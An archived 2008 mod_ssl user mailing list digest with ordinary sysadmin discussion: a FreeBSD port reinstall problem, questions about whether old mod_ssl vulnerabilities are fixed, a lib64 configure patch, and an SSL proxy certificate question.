In-Reply-To: <4798A117.2040003@daltons.ca>
Message-ID: <20080125150525.N54184@server1.home.haddow.com.au>
References: <20080122135248.V54184@server1.home.haddow.com.au>
 <4798A117.2040003@daltons.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl@haddow.info
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



On Thu, 24 Jan 2008, Aaron Dalton wrote:

> Date: Thu, 24 Jan 2008 07:30:47 -0700
> From: Aaron Dalton 
> Reply-To: modssl-users@modssl.org
> To: modssl-users@modssl.org, modssl@haddow.info
> Subject: Re: Apache with Mod ssl on a system running apache on freebsd
>
> modssl@haddow.info wrote:
> > Trying to upgrade a freebsd 6.1 that is running "Apache/1.3.39 (Unix)
> > PHP/5.2.4 with Suhosin-Patch" to include mod_ssl.
> >
> > It makes, with no problems but when I install it, it requiers Apache to be
> > deinstalled, the big problem is that Apache has a few required packages
> > that can not be removed with out a lot of problems.
> >
>
> You should be able to do a full "make" without deinstalling the old
> Apache.  If make words, then it should only take a minute to do a "make
> deinstall reinstall."  Of course, this doesn't account for time tweaking
> the conf files and debugging.  This is why you really need a development
> machine that is essentially a mirror of the critical app server so you
> can do test runs and such.  Or a 2nd (or 3rd) app server for redundancy
> if this server is so important.  In any case, you *will* at some point
> have to down your web server to do the upgrade.  That is unavoidable.
>

Aaron you did not read it..

The problem I have is it will not do a deinstall as there is other
packages that are using it, so a deinstall and reinstall does not work.

I have mod_ssl working on other machines, but they will be decommissioned
as soon as I get the other server up with mod_ssl.

we forgot to install mod_ssl before getting this system up, so now we are
trying to get it running.

Regards

haddow
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 25 16:22:01 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5AA1014D9E4; Fri, 25 Jan 2008 16:22:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from defout.telus.net (defout.telus.net [199.185.220.240])
	by master.modssl.org (Postfix) with ESMTP id 9EF0F14D84C
	for ; Fri, 25 Jan 2008 16:21:58 +0100 (CET)
Received: from priv-edtnaa06.telusplanet.net ([137.186.246.196])
          by priv-edtnes28.telusplanet.net
          (InterMail vM.7.08.02.02 201-2186-121-104-20070414) with ESMTP
          id <20080125152142.EYFP13263.priv-edtnes28.telusplanet.net@priv-edtnaa06.telusplanet.net>;
          Fri, 25 Jan 2008 08:21:42 -0700
Received: from [192.168.2.100] (d137-186-246-196.abhsia.telus.net [137.186.246.196])
	by priv-edtnaa06.telusplanet.net (BorderWare MXtreme Infinity Mail Firewall) with ESMTP
	id 0D85KLMQDU; Fri, 25 Jan 2008 08:21:41 -0700 (MST)
Message-ID: <4799FE94.6080203@daltons.ca>
Date: Fri, 25 Jan 2008 08:21:56 -0700
From: Aaron Dalton 
User-Agent: Thunderbird 2.0.0.9 (Windows/20071031)
MIME-Version: 1.0
To: modssl-users@modssl.org, modssl@haddow.info
Subject: Re: Apache with Mod ssl on a system running apache on freebsd
References: <20080122135248.V54184@server1.home.haddow.com.au> <4798A117.2040003@daltons.ca> <20080125150525.N54184@server1.home.haddow.com.au>
In-Reply-To: <20080125150525.N54184@server1.home.haddow.com.au>
X-Enigmail-Version: 0.95.6
OpenPGP: id=8811D2A4;
	url=https://biglumber.com/x/web?qs=8811d2a4
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aaron Dalton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

modssl@haddow.info wrote:
> 
> On Thu, 24 Jan 2008, Aaron Dalton wrote:
> 
>> Date: Thu, 24 Jan 2008 07:30:47 -0700
>> From: Aaron Dalton 
>> Reply-To: modssl-users@modssl.org
>> To: modssl-users@modssl.org, modssl@haddow.info
>> Subject: Re: Apache with Mod ssl on a system running apache on freebsd
>>
>> modssl@haddow.info wrote:
>>> Trying to upgrade a freebsd 6.1 that is running "Apache/1.3.39 (Unix)
>>> PHP/5.2.4 with Suhosin-Patch" to include mod_ssl.
>>>
>>> It makes, with no problems but when I install it, it requiers Apache to be
>>> deinstalled, the big problem is that Apache has a few required packages
>>> that can not be removed with out a lot of problems.
>>>
>> You should be able to do a full "make" without deinstalling the old
>> Apache.  If make words, then it should only take a minute to do a "make
>> deinstall reinstall."  Of course, this doesn't account for time tweaking
>> the conf files and debugging.  This is why you really need a development
>> machine that is essentially a mirror of the critical app server so you
>> can do test runs and such.  Or a 2nd (or 3rd) app server for redundancy
>> if this server is so important.  In any case, you *will* at some point
>> have to down your web server to do the upgrade.  That is unavoidable.
>>
> 
> Aaron you did not read it..
> 
> The problem I have is it will not do a deinstall as there is other
> packages that are using it, so a deinstall and reinstall does not work.
> 

Of course I read your post.  Why when there are misunderstandings do 
people always assume it's the listener's fault and not their own?

Are you saying you are not *able* to remove the old Apache or not 
*willing* to?  If you are not *willing* to, then I cannot help without 
more information on why.  If you are saying you're not *able* to, I 
think you're mistaken, or there is more information that you haven't 
shared yet.

"make deinstall" will remove a port regardless of any dependencies.  I 
assume you're talking about replacing the old apache with the exact same 
version, just with mod_ssl compiled in.  In that case you still do what 
I mentioned earlier:
   1) build the port w/ mod_ssl
   2) make deinstall reinstall
   3) pkgdb -Ff (to tell the port system that prior dependencies should 
now point to the mod_ssl'd apache)

I'm happy to help if you want, I just need more information to be effective.

-- 
Aaron Dalton       |   Super Duper Games
aaron@daltons.ca   |   http://superdupergames.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 26 05:00:11 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6015214D9D6; Sat, 26 Jan 2008 05:00:11 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from westnet.haddow.com.au (westnet.haddow.com.au [202.173.185.135])
	by master.modssl.org (Postfix) with ESMTP id 89BE614D836
	for ; Sat, 26 Jan 2008 05:00:05 +0100 (CET)
Received: from server1.home.haddow.com.au (server1.home.haddow.com.au [192.168.100.5])
	by westnet.haddow.com.au (8.12.8p1/8.12.8) with ESMTP id m0Q3xllr039493
	for ; Sat, 26 Jan 2008 14:59:48 +1100 (EST)
	(envelope-from modssl@haddow.info)
Date: Sat, 26 Jan 2008 14:59:47 +1100 (EST)
From: modssl@haddow.info
X-X-Sender: shaddow@server1.home.haddow.com.au
To: modssl-users@modssl.org
Subject: Re: Apache with Mod ssl on a system running apache on freebsd
In-Reply-To: <4799FE94.6080203@daltons.ca>
Message-ID: <20080126144135.D54184@server1.home.haddow.com.au>
References: <20080122135248.V54184@server1.home.haddow.com.au>
 <4798A117.2040003@daltons.ca> <20080125150525.N54184@server1.home.haddow.com.au>
 <4799FE94.6080203@daltons.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl@haddow.info
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



On Fri, 25 Jan 2008, Aaron Dalton wrote:


> modssl@haddow.info wrote:
> >
> > On Thu, 24 Jan 2008, Aaron Dalton wrote:
> >
> >> Date: Thu, 24 Jan 2008 07:30:47 -0700
> >> From: Aaron Dalton 
> >> Reply-To: modssl-users@modssl.org
> >> To: modssl-users@modssl.org, modssl@haddow.info
> >> Subject: Re: Apache with Mod ssl on a system running apache on freebsd
> >>
> >> modssl@haddow.info wrote:
> >>> Trying to upgrade a freebsd 6.1 that is running "Apache/1.3.39 (Unix)
> >>> PHP/5.2.4 with Suhosin-Patch" to include mod_ssl.
> >>>
> >>> It makes, with no problems but when I install it, it requiers Apache to be
> >>> deinstalled, the big problem is that Apache has a few required packages
> >>> that can not be removed with out a lot of problems.
> >>>
> >> You should be able to do a full "make" without deinstalling the old
> >> Apache.  If make words, then it should only take a minute to do a "make
> >> deinstall reinstall."  Of course, this doesn't account for time tweaking
> >> the conf files and debugging.  This is why you really need a development
> >> machine that is essentially a mirror of the critical app server so you
> >> can do test runs and such.  Or a 2nd (or 3rd) app server for redundancy
> >> if this server is so important.  In any case, you *will* at some point
> >> have to down your web server to do the upgrade.  That is unavoidable.
> >>
> >
> > Aaron you did not read it..
> >
> > The problem I have is it will not do a deinstall as there is other
> > packages that are using it, so a deinstall and reinstall does not work.
> >
>
> Of course I read your post.  Why when there are misunderstandings do
> people always assume it's the listener's fault and not their own?
>
> Are you saying you are not *able* to remove the old Apache or not
> *willing* to?  If you are not *willing* to, then I cannot help without
> more information on why.  If you are saying you're not *able* to, I
> think you're mistaken, or there is more information that you haven't
> shared yet.
>
> "make deinstall" will remove a port regardless of any dependencies.  I
> assume you're talking about replacing the old apache with the exact same
> version, just with mod_ssl compiled in.  In that case you still do what
> I mentioned earlier:
>    1) build the port w/ mod_ssl
>    2) make deinstall reinstall
>    3) pkgdb -Ff (to tell the port system that prior dependencies should
> now point to the mod_ssl'd apache)
>
> I'm happy to help if you want, I just need more information to be effective.
>

Aaron

I am not able to remove or deinstall because of the dependencies, that is
the problem

I have built apache with mod_ssl

but when we try a make deinstall reinstall, it says it can not deinstall
bacuse it has dependencies

so I am not sure what to do now


Regards

modssl
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jan 26 15:11:01 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7BECD14D9E8; Sat, 26 Jan 2008 15:11:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from defout.telus.net (defout.telus.net [199.185.220.240])
	by master.modssl.org (Postfix) with ESMTP id 41D4914D836
	for ; Sat, 26 Jan 2008 15:10:59 +0100 (CET)
Received: from priv-edtnaa06.telusplanet.net ([137.186.246.196])
          by priv-edtnes28.telusplanet.net
          (InterMail vM.7.08.02.02 201-2186-121-104-20070414) with ESMTP
          id <20080126141043.YXM13263.priv-edtnes28.telusplanet.net@priv-edtnaa06.telusplanet.net>
          for ; Sat, 26 Jan 2008 07:10:43 -0700
Received: from [192.168.2.100] (d137-186-246-196.abhsia.telus.net [137.186.246.196])
	by priv-edtnaa06.telusplanet.net (BorderWare MXtreme Infinity Mail Firewall) with ESMTP id EBD9JPRLAG
	for ; Sat, 26 Jan 2008 07:10:43 -0700 (MST)
Message-ID: <479B3F72.5060300@daltons.ca>
Date: Sat, 26 Jan 2008 07:10:58 -0700
From: Aaron Dalton 
User-Agent: Thunderbird 2.0.0.9 (Windows/20071031)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache with Mod ssl on a system running apache on freebsd
References: <20080122135248.V54184@server1.home.haddow.com.au> <4798A117.2040003@daltons.ca> <20080125150525.N54184@server1.home.haddow.com.au> <4799FE94.6080203@daltons.ca> <20080126144135.D54184@server1.home.haddow.com.au>
In-Reply-To: <20080126144135.D54184@server1.home.haddow.com.au>
X-Enigmail-Version: 0.95.6
OpenPGP: id=8811D2A4;
	url=https://biglumber.com/x/web?qs=8811d2a4
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aaron Dalton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

modssl@haddow.info wrote:
> 
> Aaron
> 
> I am not able to remove or deinstall because of the dependencies, that is
> the problem
> 
> I have built apache with mod_ssl
> 
> but when we try a make deinstall reinstall, it says it can not deinstall
> bacuse it has dependencies
> 
> so I am not sure what to do now
> 

Can you append the console output?  "make deinstall" should never fail 
due to dependencies.  I do this procedure all the time; in fact, it's 
the only way tools like portupgrade can work.  Otherwise you'd have to 
uninstall huge chunks of your ports tree to upgrade any one of them. 
"pkg_deinstall" on the other hand does block in that way.  Perhaps the 
console record will shed some light.

-- 
Aaron Dalton       |   Super Duper Games
aaron@daltons.ca   |   http://superdupergames.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb  9 00:39:20 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4D26E14DA34; Sat,  9 Feb 2008 00:39:20 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mta02.xtra.co.nz (mta02.xtra.co.nz [210.54.141.253])
	by master.modssl.org (Postfix) with ESMTP id D1F2814D82E
	for ; Sat,  9 Feb 2008 00:39:17 +0100 (CET)
Received: from fep03.xtra.co.nz ([172.23.12.31]) by mta02.xtra.co.nz
          with ESMTP
          id <20080208233857.GNPP6282.mta02.xtra.co.nz@fep03.xtra.co.nz>
          for ; Sat, 9 Feb 2008 12:38:57 +1300
Received: from kanga.cyberdyne.co.mars ([222.154.83.37])
          by fep03.xtra.co.nz with SMTP
          id <20080208233857.QKMU18083.fep03.xtra.co.nz@kanga.cyberdyne.co.mars>
          for ; Sat, 9 Feb 2008 12:38:57 +1300
Received: (qmail 65242 invoked from network); 8 Feb 2008 23:38:56 -0000
Received: from tigger.cyberdyne.co.mars (HELO ?10.146.171.54?) (10.146.171.54)
  by 0 with SMTP; 8 Feb 2008 23:38:56 -0000
Message-ID: <47ACE80F.9020304@xtra.co.nz>
Date: Sat, 09 Feb 2008 12:38:55 +1300
From: James Collier 
Organization: Cyberdyne Systems Ltd.
User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.7.12) Gecko/20050920
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: For the record ... close BugDB-PR#580 [Duplicate CVE-2005-2700]
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Collier 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I'm not sure if anyone ever inherited or merged the original Apache 
mod_ssl bug list from engelschall.com - or less likely, still cares - 
but if so, the vulnerability & proposed fix given as BugDB-PR#580 
[14-Jun-2001] can be closed as a duplicate of CVE-2005-2700.

Yes, OK, I've been out of touch for a while  ... only just came across 
this again.

James.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 21 12:26:29 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4359114DA3B; Thu, 21 Feb 2008 12:26:29 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from web94605.mail.in2.yahoo.com (web94605.mail.in2.yahoo.com [203.104.17.149])
	by master.modssl.org (Postfix) with SMTP id D9A4914D839
	for ; Thu, 21 Feb 2008 12:26:26 +0100 (CET)
Received: (qmail 15508 invoked by uid 60001); 21 Feb 2008 11:26:06 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Reply-To:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=qoowkoVMcRS56VXAc0++4ss8Qow2apOtisWNO9c+AtILNecz3SplqZsJRdfMZw+k3S0NLLeXEIcl7fSkdkWkfgHDitu1Gvb02MJqmi++hJCHEVEo/2svLV7nU5VuZ3ROCfTopQlblj2tcGeyVdd4C/Dg3SLgdypSysIEVf63YiQ=;
X-YMail-OSG: YEkBBucVM1mAl0NwQWVggHNDxcMkG6UCjRauBIggCIOCUInuyjyivmyKq1CiYowBpq8SzyuVcLsfwfWquRIG3nhtdQUB._fFY8koabIade6PcKF51fk-
Received: from [59.160.68.5] by web94605.mail.in2.yahoo.com via HTTP; Thu, 21 Feb 2008 16:56:05 IST
X-Mailer: YahooMailWebService/0.7.162
Date: Thu, 21 Feb 2008 16:56:05 +0530 (IST)
From: nitin dubey 
Subject: Query about mod_ssl bundled with apache 2.2.8 sources
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Message-ID: <170056.14943.qm@web94605.mail.in2.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: nitin dubey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have downloaded the sources of latest apache 2.2.8 that includes mod_ssl =
as well.  My concern is about the two vulnerabilities (http://www.securityf=
ocus.com/bid/10736/info, http://www.securityfocus.com/bid/4189/info).  I do=
 not have any information whether or not these two vulnerabilities still ex=
ist or have been fixed in the mod_ssl provided with apache sources 2.2.8.

After googling I could find out that these are solved in mod_ssl 2.8.19.  W=
hen I go to modssl.org to download the latest version there is no download =
for mod_ssl latest for apache 2.x versions?

Both of these look very old and looks like they might have been fixed.  But=
 I did not find it anywhere written.
=0A=0A=0A      5, 50, 500, 5000 - Store N number of mails in your inbox. Go=
 to http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Feb 21 12:32:01 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8B58C14DA3B; Thu, 21 Feb 2008 12:32:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from web94601.mail.in2.yahoo.com (web94601.mail.in2.yahoo.com [203.104.17.133])
	by master.modssl.org (Postfix) with SMTP id 576DE14D839
	for ; Thu, 21 Feb 2008 12:31:59 +0100 (CET)
Received: (qmail 15227 invoked by uid 60001); 21 Feb 2008 11:31:39 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=X-YMail-OSG:Received:X-Mailer:Date:From:Reply-To:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=MnDYXzjhE0q1iyh8E5J+tSaITGG2Hd9kPzq1//ATATjuQnLLR26eirqWgSfPXitAvRluwSCaODi3niP1Sm0SysXKc3u/wn8Pu84BGpq9Ap4DrVEeYMNaaIkTWpCQuUk+Iro9tkgHy4V1lD/bWRIXmgaQ3Ws1RdQgaGmLSPNXxxM=;
X-YMail-OSG: 6sz9nS0VM1kGLP2oiIokuHFbnzl7WcZW_iq8r50bNHiIwqS_J02TeMgB2zS7NL.kMQ--
Received: from [59.160.68.5] by web94601.mail.in2.yahoo.com via HTTP; Thu, 21 Feb 2008 17:01:38 IST
X-Mailer: YahooMailWebService/0.7.162
Date: Thu, 21 Feb 2008 17:01:38 +0530 (IST)
From: nitin dubey 
Subject: Query about mod_ssl bundled with apache 2.2.8 sources
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: quoted-printable
Message-ID: <1688.9699.qm@web94601.mail.in2.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: nitin dubey 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have downloaded the sources of latest apache 2.2.8 that includes mod_ssl =
as well.  My concern is about the two vulnerabilities (htp://www.securityfo=
cus.com/bid/10736/info, htp://www.securityfocus.com/bid/4189/info).  I do n=
ot have any information whether or not these two vulnerabilities still exis=
t or have been fixed in the mod_ssl provided with apache sources 2.2.8.

After googling I could find out that these are solved in mod_ssl 2.8.19.  W=
hen I go to modssl.org to download the latest version there is no download =
for mod_ssl latest for apache 2.x versions?

Both of these look very old and looks like they might have been fixed.  But=
 I did not find it anywhere written.=0A=0A=0A      Now you can chat without=
 downloading messenger. Go to http://in.messenger.yahoo.com/webmessengerpro=
mo.php
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 29 22:19:42 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EA94514DA37; Fri, 29 Feb 2008 22:19:42 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from sizzo.org (sizzo.org [69.63.177.213])
	by master.modssl.org (Postfix) with ESMTP id 81BA414D851
	for ; Fri, 29 Feb 2008 22:19:40 +0100 (CET)
Received: from [172.24.24.222] (unknown [204.15.20.251])
	(using TLSv1 with cipher AES128-SHA (128/128 bits))
	(No client certificate requested)
	by sizzo.org (Postfix) with ESMTP id A59776DC9A8
	for ; Fri, 29 Feb 2008 13:09:23 -0800 (PST)
Mime-Version: 1.0 (Apple Message framework v753)
Content-Transfer-Encoding: 7bit
Message-Id: 
Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed
To: modssl-users@modssl.org
From: Brian Shire 
Subject: PATCH: lib64 support for configure
Date: Fri, 29 Feb 2008 13:19:17 -0800
X-Mailer: Apple Mail (2.753)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Brian Shire 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello,

compiling mod_ssl on a 64-bit system failed for me because the  
libraries are located under lib64 paths, rather than just lib paths.   
It seems like the following should be the correct   fix for these  
systems unless I missed some other option to change this (which I  
didn't see, but please let me know if I missed it).  (Perhaps a -- 
with-libdir option should be included as a way for people to modify  
this as well.)  The patch below doesn't include lib64 when SSL_BASE  
is provided, so that may need to be applied as well.

Thanks!

-shire


Index: pkg.sslmod/libssl.module
===================================================================
--- pkg.sslmod/libssl.module    (revision 85384)
+++ pkg.sslmod/libssl.module    (working copy)
@@ -410,7 +410,7 @@
      #
      if [ ".$SSL_BASE" = .SYSTEM ]; then
          SSL_LIBDIR=""
-        for p in . /lib /usr/lib /usr/local/lib; do
+        for p in . /lib64 /usr/lib64 /lib /usr/lib /usr/local/lib; do
              if [ -f "$p/libssl.a" -o -f "$p/libssl.so" ]; then
                  SSL_LIBDIR="$p"
                  my_real_ssl_libdir="$p"
@@ -419,7 +419,7 @@
          done
          if [ ".$SSL_LIBDIR" = . ]; then
              echo "Error: Cannot find SSL library files in any of  
the following dirs:" 1>&2
-            echo "Error: . /lib /usr/lib /usr/local/lib" 1>&2
+            echo "Error: . /lib64 /usr/lib64 /lib /usr/lib /usr/ 
local/lib" 1>&2
              exit 1
          fi
      else

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 29 22:19:54 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2E04514DA44; Fri, 29 Feb 2008 22:19:54 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mailhub1.si.c-s.fr (pegase1.c-s.fr [194.2.40.7])
	by master.modssl.org (Postfix) with ESMTP id 43CAB14DA37
	for ; Fri, 29 Feb 2008 22:19:52 +0100 (CET)
Received: from localhost (mailhub1-int [192.168.12.234])
	by localhost (Postfix) with ESMTP id B9D3D1CA142
	for ; Fri, 29 Feb 2008 22:17:02 +0100 (CET)
X-Virus-Scanned: amavisd-new at c-s.fr
Received: from mailhub1.si.c-s.fr ([192.168.12.234])
	by localhost (mailhub1.c-s.fr [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id D3K6-db+dEO6 for ;
	Fri, 29 Feb 2008 22:17:02 +0100 (CET)
Received: from messagerie.si.c-s.fr (messagerie [192.168.25.192])
	by pegase1.c-s.fr (Postfix) with ESMTP id A64801CA13F
	for ; Fri, 29 Feb 2008 22:17:02 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by messagerie.si.c-s.fr (Postfix) with ESMTP id 52960C7FAF
	for ; Fri, 29 Feb 2008 22:19:31 +0100 (CET)
X-Virus-Scanned: amavisd-new at c-s.fr
Received: from messagerie.si.c-s.fr ([127.0.0.1])
	by localhost (messagerie.si.c-s.fr [127.0.0.1]) (amavisd-new, port 10023)
	with ESMTP id NubIMrDF2B-E for ;
	Fri, 29 Feb 2008 22:19:31 +0100 (CET)
Received: from messagerie.si.c-s.fr (localhost [127.0.0.1])
	(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
	(No client certificate requested)
	by messagerie.si.c-s.fr (Postfix) with ESMTP id 2C221C754B
	for ; Fri, 29 Feb 2008 22:19:31 +0100 (CET)
Received: (from vmail@localhost)
	by messagerie.si.c-s.fr (8.13.1/8.13.1/Submit) id m1TLJU91005535;
	Fri, 29 Feb 2008 22:19:30 +0100
Date: Fri, 29 Feb 2008 22:19:30 +0100
Message-Id: <200802292119.m1TLJU91005535@messagerie.si.c-s.fr>
X-Authentication-Warning: messagerie.si.c-s.fr: vmail set sender to guillaume.rablat@c-s.fr using -f
From: guillaume.rablat@c-s.fr
To: modssl-users@modssl.org
References: 
In-Reply-To: 
Subject: Re: PATCH: lib64 support for configure
MIME-Version: 1.0
Content-Type: text/plain
X-remark: Automatic response generated by autoresponder v1.16.7 (r1.18)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: guillaume.rablat@c-s.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Je suis absent jusqu'au 03/02/08.
Cordialement,
Guillaume RABLAT
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar  5 16:39:44 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 585C814D9ED; Wed,  5 Mar 2008 16:39:44 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ndmz1s1a.cic.gc.ca (ndmz1s1a.cic.gc.ca [205.194.127.87])
	by master.modssl.org (Postfix) with ESMTP id 0EB0914D82F
	for ; Wed,  5 Mar 2008 16:39:42 +0100 (CET)
X-AuditID: cdc27f57-000010d000000774-19-47cebda76fd7
Received: from njes1s1004.ci.gc.ca ([10.24.216.53]) by ndmz1s1a.cic.gc.ca with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 5 Mar 2008 10:35:03 -0500
Received: from NJES1S5004.nhq.ci.gc.ca ([10.24.216.153]) by njes1s1004.ci.gc.ca with Microsoft SMTPSVC(5.0.2195.6713);
	 Wed, 5 Mar 2008 10:39:20 -0500
X-MimeOLE: Produced By Microsoft Exchange V6.0.6603.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: SSLProxyEngine & SSLEngine
Date: Wed, 5 Mar 2008 10:39:20 -0500
Message-ID: <3762EE4E461CF04B96D5B4E0F039FA400188327F@njes1s5004.nhq.ci.gc.ca>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSLProxyEngine & SSLEngine
Thread-Index: Ach+1xR8Y5jKuGYcR2WxYzOt4C1QyQ==
From: "Drouin.Mathieu" 
To: 
X-OriginalArrivalTime: 05 Mar 2008 15:39:20.0682 (UTC) FILETIME=[147C54A0:01C87ED7]
X-Brightmail-Tracker: AAAAAA==
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drouin.Mathieu" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I'm trying to get an outbound HTTPS request to be relayed by apache to a
remote server in the following manner.

Servlet sitting on Backend Server (Tomcat) -> Proxy Server (Apache) ->
Remote Server

The communication between the proxy server and the remote server has to
be HTTPS and the certificate that I have currently sits on the proxy
server.

I seem to have hit a dead end and I was wondering if any of you could
help me.

Ideally, I'd like to be sending an HTTP request to Apache who then
encrypts the request for the remote server, but from what I have read
that is not possible. The request has to be encrypted for the
SSLProxyEngine to relay it.

Another option that I was looking at was having a self-signed
certificate for communication between the backend server and the proxy
server and having the proxy server re-encrypt the request with another
certificate to the remote server. Again, it seems like we can only
specify 1 certificate with the SSLProxyEngine directives.

Finally my last option was that the backend server encrypts the outbound
request using the same certificate found on the Proxy Server, I use the
SSLProxyEngine on the proxy server to forward that request to the remote
server. Unfortunately, because of the Common Name in the certificate I
doubt that the same certificate can sit on 2 different machines.

Are my assumptions correct or is there something I haven't considered?

